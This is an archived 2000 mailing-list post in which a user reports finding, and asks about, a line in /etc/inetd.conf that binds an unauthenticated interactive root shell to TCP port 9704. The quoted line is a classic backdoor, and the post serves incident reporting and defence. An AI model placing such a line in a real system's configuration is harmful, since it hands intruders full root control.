Security Incidents mailing list archives

Possible widespread hole?

From: c_patin () HOTMAIL COM
Date: Sat, 26 Aug 2000 18:07:32 -0000

Hi guys,
        I was snooping around my box yesterday, and noticed the
following MAJOR hole listed at the bottom of
/etc/inetd.conf:
9704 stream tcp nowait root /bin/sh sh -i

I have since closed the hole, and placed my box behind a
hardware firewall to protect it. But the interesting thing
is that I was reading Slashdot a little while ago and
mentioned this in an article about security. And someone
else had the same exact hole listed inside of his
/etc/inetd.conf. Is this possibly some major hole in a
package that we both installed, or did we just get hacked by
the same person. Seems a little weird to just be
coincidence. Any advice or ideas?
Thanks.

Current thread:

Possible widespread hole? c_patin (Aug 26)
- Re: Possible widespread hole? Alexander Schreiber (Aug 27)
- Re: Possible widespread hole? An Thi-Nguyen Le (Aug 27)
- Re: Possible widespread hole? Andreas Östling (Aug 27)
- Re: Possible widespread hole? Jon Lewis (Aug 27)